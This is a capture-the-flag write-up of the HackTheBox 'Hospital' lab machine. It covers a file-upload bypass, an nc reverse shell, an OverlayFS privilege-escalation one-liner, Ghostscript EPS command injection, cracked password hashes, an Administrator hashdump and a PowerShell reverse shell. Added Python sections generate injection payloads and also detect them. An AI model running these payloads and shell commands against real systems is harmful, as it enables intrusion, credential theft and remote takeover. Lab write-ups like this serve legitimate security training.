HTB-Hospital(Medium)

admin, 2023-11-24 12:44:40

Key points: single-file PHP shell, Ubuntu local privilege escalation, Ghostscript command injection




Scan

┌──(kali㉿kali)-[~/Desktop/htb/Hospital]
└─$ sudo nmap -sC -sV -T4 -Pn 10.10.11.241
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-22 07:56 EST
Nmap scan report for 10.10.11.241
Host is up (0.20s latency).
Not shown: 980 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
22/tcp   open  ssh               OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e1:4b:4b:3a:6d:18:66:69:39:f7:aa:74:b3:16:0a:aa (ECDSA)
|_  256 96:c1:dc:d8:97:20:95:e7:01:5f:20:a2:43:61:cb:ca (ED25519)
53/tcp   open  domain            Simple DNS Plus
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2023-11-22 19:56:57Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
443/tcp  open  ssl/http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| tls-alpn: 
|_  http/1.1
|_http-title: 400 Bad Request
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
1801/tcp open  msmq?
2103/tcp open  msrpc             Microsoft Windows RPC
2105/tcp open  msrpc             Microsoft Windows RPC
2107/tcp open  msrpc             Microsoft Windows RPC
2179/tcp open  vmrdp?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
3269/tcp open  globalcatLDAPssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
3389/tcp open  ms-wbt-server     Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.hospital.htb
| Not valid before: 2023-09-05T18:39:34
|_Not valid after:  2024-03-06T18:39:34
| rdp-ntlm-info: 
|   Target_Name: HOSPITAL
|   NetBIOS_Domain_Name: HOSPITAL
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: hospital.htb
|   DNS_Computer_Name: DC.hospital.htb
|   DNS_Tree_Name: hospital.htb
|   Product_Version: 10.0.17763
|_  System_Time: 2023-11-22T19:58:15+00:00
8080/tcp open  http              Apache httpd 2.4.55 ((Ubuntu))
| http-title: Login
|_Requested resource was login.php
|_http-open-proxy: Proxy might be redirecting requests
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.55 (Ubuntu)
Service Info: Host: DC; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-11-22T19:58:20
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 6h59m55s, deviation: 0s, median: 6h59m54s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 146.47 seconds


Enum

Seeing 88, 135, 139 and 445 open basically means a domain controller. Tried SMB first to see whether any share was accessible; nothing. Added the domain names from the scan (hospital.htb, DC.hospital.htb) to /etc/hosts and turned to the web services to see if there was an opening. Note the two web stacks: 443 is Apache on Win64 with PHP 8.0.28 (the DC itself), while 8080 is Apache 2.4.55 on Ubuntu, so 8080 is a separate Linux host or container behind the same address.

Port 443 first: just a login form, no registration button. Poked around a bit; nothing much to work with.

Then port 8080, which has a "make one" link to register an account.

After registering and logging in there is an upload function. Uploading a file with the usual .php extension fails; that extension is blocked.

Tried a .phar extension instead: accepted, and the server still runs it as PHP.

Some Phar exploitation techniques: https://xz.aliyun.com/t/3692

dirsearch turned up an uploads directory; requesting the uploaded filename under that directory executes the webshell.
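As an added example (not code from the original post or the target), the following Python models the two upload checks side by side. The weak version mirrors what was observed: a blocklist that rejects only a literal `.php`, so `.phar` goes straight through, as do `.PHP` and `.phtml` (which extensions the target's Apache/mod_php actually hands to PHP is an assumption here; the usual set is listed). The hardened version allowlists a few harmless extensions, compares case-insensitively, rejects double extensions and path components, and stores the file under a server-chosen name. The candidate filenames are constructed for the demonstration.

```python
import os
import re

# Extensions a typical Apache + mod_php setup executes as PHP (assumed, not
# taken from the target). The page shows .php blocked and .phar accepted.
PHP_EXECUTABLE_EXTS = {".php", ".phar", ".phtml", ".php3", ".php4",
                       ".php5", ".php7", ".phps", ".pht"}

# Harmless extensions the hardened check will accept.
ALLOWED = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}


def blocklist_allows(filename: str) -> bool:
    """Weak check: one blocked extension, compared case-sensitively."""
    ext = os.path.splitext(filename)[1]
    return ext != ".php"


def allowlist_allows(filename: str) -> bool:
    """Hardened check: allowlist, case-insensitive, single extension,
    no path components, restricted base name."""
    base = os.path.basename(filename)
    if base != filename or base in ("", ".", ".."):
        return False                       # path traversal or empty name
    parts = base.lower().split(".")
    if len(parts) != 2:
        return False                       # rejects shell.php.jpg and bare names
    if not re.fullmatch(r"[a-z0-9_-]{1,64}", parts[0]):
        return False
    return "." + parts[1] in ALLOWED


def safe_stored_name(filename: str, random_token: str) -> str:
    """Never keep the client's name on disk: server token + vetted extension."""
    if not allowlist_allows(filename):
        raise ValueError("extension not allowed")
    ext = "." + filename.lower().rsplit(".", 1)[1]
    return random_token + ext


def audit(candidates):
    """Names the blocklist accepts but the allowlist rejects: the bypass surface."""
    return [c for c in candidates
            if blocklist_allows(c) and not allowlist_allows(c)]


# Constructed test names, not from the target.
CANDIDATES = ["shell.php", "shell.phar", "shell.PHP", "shell.phtml",
              "shell.php.jpg", "img.jpg", "../shell.phar"]

if __name__ == "__main__":
    for name in CANDIDATES:
        print(f"{name:16} blocklist={blocklist_allows(name)!s:5} "
              f"allowlist={allowlist_allows(name)}")
    print("bypasses:", audit(CANDIDATES))
```

The point of `audit` is that a blocklist can only be as complete as the attacker's imagination is small; the allowlist does not need to know about `.phar` at all to reject it.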

But a basic one-liner shell calling system() did not execute, and the uploads directory is cleaned automatically, so files disappear after a short while. To get a reverse shell, run the command through a fuller webshell instead; this one was shared by someone on a hacker forum:

https://github.com/flozz/p0wny-shell/blob/master/shell.php

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.86 4444 >/tmp/f



Docker privilege escalation

With the shell we can see we are inside a Docker container as a low-privileged user. Checking the kernel version, it is the same privesc route as on Analytics earlier (Ubuntu OverlayFS, CVE-2023-2640 / CVE-2023-32629).

Article links:

https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("chmod +s /bin/bash")'
/bin/bash -p


Alternatively, CVE-2021-3493 (the older OverlayFS bug) can be thrown at it directly:

https://github.com/briskets/CVE-2021-3493/tree/main

As root, /etc/shadow gives the following hashes. Feed them to john: drwilliams' password cracks against rockyou (note john reports only one hash loaded, the sha512crypt entry; the root entry is yescrypt, $y$).

root:$y$j9T$s/Aqv48x449udndpLC6eC.$WUkrXgkW46N4xdpnhMoax7US.JgyJSeobZ1dzDs..dD:19612:0:99999:7:::
drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:99999:7:::

┌──(kali㉿kali)-[~/Desktop/htb/Hospital]
└─$ john -w:/usr/share/wordlists/rockyou.txt hash 
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
qwe123!@#        (drwilliams)     
1g 0:00:01:25 DONE (2023-11-22 09:02) 0.01166g/s 2498p/s 2498c/s 2498C/s raycharles..pucci
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 


webmail

The recovered credentials (drwilliams / qwe123!@#) log into the webmail interface on port 443.

Inside there is an email exchange: roughly, the other party is expecting a file in .eps format and will view it with GhostScript. So we can reply with an .eps that carries a shell payload, and it will be executed when they open it.


GhostScript

A search for Ghostscript vulnerabilities

turns up this project: https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection

┌──(kali㉿kali)-[~/Desktop/htb/Hospital/CVE-2023-36664-Ghostscript-command-injection-main]
└─$ python3 CVE_2023_36664_exploit.py -g --payload calc --filename geqian --extension eps
[+] Generated EPS payload file: geqian.eps

┌──(kali㉿kali)-[~/Desktop/htb/Hospital/CVE-2023-36664-Ghostscript-command-injection-main]
└─$ cat geqian.eps
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: 0 0 300 300
%%Title: Welcome EPS
/Times-Roman findfont
24 scalefont
setfont
newpath
50 200 moveto
(Welcome at vsociety!) show
newpath
30 100 moveto
60 230 lineto
90 100 lineto
stroke
(%pipe%calc) (w) file /DCTDecode filter
showpage

The above is a throwaway test file generated by following the GitHub README; the injection point is the (%pipe%calc) (w) file line, where Ghostscript opens a %pipe% device and runs the string after it as a command. Replace calc with a PowerShell reverse shell one-liner.

Online reverse shell generator: https://www.revshells.com/

Then send the .eps as an email attachment and the shell comes back.
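As an added example (not part of the original post, and not the PoC project's code), the following Python builds the same EPS skeleton shown above around an arbitrary command, and pairs it with a small scanner that flags PostScript/EPS input opening a %pipe% device, which is what a mail gateway or upload handler would want to catch. The escaping of parentheses and backslashes follows PostScript string-literal rules; the scanner only models the `(%pipe%...) (mode) file` pattern seen on this page, not every way Ghostscript can be handed a device name. The commands are constructed placeholders.

```python
import re

# Skeleton copied from the generated geqian.eps above; {device} is the injection point.
EPS_TEMPLATE = """%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: 0 0 300 300
%%Title: Welcome EPS
/Times-Roman findfont
24 scalefont
setfont
newpath
50 200 moveto
(Welcome at vsociety!) show
newpath
30 100 moveto
60 230 lineto
90 100 lineto
stroke
({device}) (w) file /DCTDecode filter
showpage
"""


def ps_string_escape(s: str) -> str:
    """Escape a value for use inside a PostScript (...) string literal."""
    return s.replace("\\", "\\\\").replace("(", "\\(").replace(")", "\\)")


def build_eps(command: str) -> str:
    """Return EPS text that makes a vulnerable Ghostscript run `command`."""
    return EPS_TEMPLATE.format(device="%pipe%" + ps_string_escape(command))


# (%pipe%<cmd>) followed by a (r|w|a) access string and the `file` operator.
# Case-insensitive and whitespace-tolerant; the command group honours escapes.
PIPE_FILE_RE = re.compile(
    r"\(\s*%pipe%((?:\\.|[^)\\])*)\)\s*\([rwa]\+?\)\s*file",
    re.IGNORECASE,
)


def find_pipe_devices(ps_text: str) -> list:
    """Commands passed to %pipe% devices in the document, raw (still escaped)."""
    return [m.group(1) for m in PIPE_FILE_RE.finditer(ps_text)]


def is_suspicious(ps_text: str) -> bool:
    return bool(find_pipe_devices(ps_text))


if __name__ == "__main__":
    # Placeholder command; a real run would carry the revshells one-liner.
    eps = build_eps("calc")
    print(eps)
    print("pipe devices:", find_pipe_devices(eps))
```

Because the scanner decodes nothing, a payload hidden behind an encoding filter or built at run time from string operators would not trigger it; for anything beyond this page's pattern the real mitigation is running a patched Ghostscript (10.01.2 or later) with -dSAFER.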


User-flag

Once on the box we pick up a set of credentials, and RDP is open:

drbrown:chr!$br0wn

RDP in and have a look. Change the password input's type attribute from password to text in the browser's inspector and the saved password is shown in the clear.

xfreerdp /v:hospital.htb /u:'drbrown' /p:'chr!$br0wn' /d:"dc.hospital.htb"

rdesktop or remmina may fail to log in here; not sure why (protocol issue, presumably?).

rdesktop -u drbrown -p 'chr!$br0wn' -d dc.hospital.htb hospital.htb


ROOT

With the Administrator password, WinRM is enough. Pop a shell back to msf and hashdump:

Administrator:Th3B3stH0sp1t4l9786!
evil-winrm -i 10.10.11.241 -u Administrator -p 'Th3B3stH0sp1t4l9786!'
meterpreter > getuid
Server username: HOSPITAL\Administrator
meterpreter > hashdump
[*] Meterpreter session 3 opened (10.10.14.119:6666 -> 10.10.11.241:21083) at 2023-11-22 10:42:05 -0500
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a1a0158142556cfc5aa9fdb974e0352f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:26fb7ca2f4a67b2d8d81ffcfeeeffd13:::
$431000-R1KSAI1DGHMH:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SM_0559ce7ac4be4fc6a:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SM_bb030ff39b6c4a2db:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SM_9326b57ae8ea44309:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SM_b1b9e7f83082488ea:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SM_e5b6f3aed4da4ac98:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SM_75554ef7137f41d68:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SM_6e9de17029164abdb:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SM_5faa2be1160c4ead8:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SM_2fe3f3cbbafa4566a:1133:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
drbrown:1601:aad3b435b51404eeaad3b435b51404ee:33a3edc8fc4cf06cb3b836c541a7b997:::
drwilliams:1602:aad3b435b51404eeaad3b435b51404ee:c377ba8a4dd52401bc404dbe49771bbc:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:e5ab307522689fdeb58c50aec017c1a4:::
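As an added example (not from the original post), the following Python triages a hashdump like the one above: it parses the pwdump lines, computes NT hashes (MD4 over UTF-16LE, unsalted) to confirm which accounts carry the empty-password hash 31d6cfe0d16ae931b73c59d7e0c089c0, and checks a candidate password against a stored NT hash. MD4 is implemented inline rather than via hashlib because OpenSSL 3 builds usually ship without it (an assumption about the reader's environment). The sample lines are copied from the hashdump above; the accounts with the empty-password hash are typically disabled built-in or mailbox placeholder accounts, so confirm the account flags before reading anything into it.

```python
import struct

# NT hash of the empty password; several accounts in the hashdump above carry it.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# LM half meaning "no LM hash stored" (LM disabled), present on every line above.
BLANK_LM = "aad3b435b51404eeaad3b435b51404ee"


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (three rounds over 16-word blocks, little-endian)."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        blk = struct.unpack("<16I", bytes(msg[off:off + 64]))
        v = [a0, b0, c0, d0]
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                t = (-i) % 4                 # step i updates a, d, c, b in turn
                p, q, r = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
                v[t] = _rotl((v[t] + fn(p, q, r) + blk[idx] + k) & 0xFFFFFFFF,
                             shifts[i % 4])
        a0, b0, c0, d0 = ((s + w) & 0xFFFFFFFF for s, w in zip((a0, b0, c0, d0), v))
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)); no salt, so identical passwords match."""
    return md4(password.encode("utf-16le")).hex()


def parse_hashdump(text: str):
    """pwdump format: user:rid:lmhash:nthash:::"""
    rows = []
    for line in text.strip().splitlines():
        user, rid, lm, nt, *_ = line.split(":")
        rows.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return rows


def empty_password_accounts(rows):
    return [r["user"] for r in rows if r["nt"] == EMPTY_NT]


def check_password(candidate: str, nt_hex: str) -> bool:
    return nt_hash(candidate) == nt_hex.lower()


# Four lines copied from the hashdump output above.
SAMPLE = """Administrator:500:aad3b435b51404eeaad3b435b51404ee:a1a0158142556cfc5aa9fdb974e0352f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SM_0559ce7ac4be4fc6a:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
drbrown:1601:aad3b435b51404eeaad3b435b51404ee:33a3edc8fc4cf06cb3b836c541a7b997:::"""

if __name__ == "__main__":
    rows = parse_hashdump(SAMPLE)
    print("empty-password accounts:", empty_password_accounts(rows))
    print("LM disabled everywhere:", all(r["lm"] == BLANK_LM for r in rows))
    print("nt_hash('') ==", nt_hash(""))
```

The unsalted NT hash is also why the hashdump is immediately useful offline: any account whose password you already know (drbrown, drwilliams, Administrator from this box) can be checked with `check_password` in microseconds, and any two accounts sharing a password show the same hash.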


Unintended path

Enumeration shows that htdocs under the xampp directory is writable and the web server runs as SYSTEM (check with icacls).


That means a shell on the hospital's internal website is already NT AUTHORITY\SYSTEM. So drop a webshell into that folder, request it, and have it spawn a reverse shell:

powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.10.14.119', 8888);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"



Originally published on the WeChat official account 搁浅安全: HTB-Hospital(Medium)

Reprinted by CN-SEC中文网: https://cn-sec.com/archives/2231318.html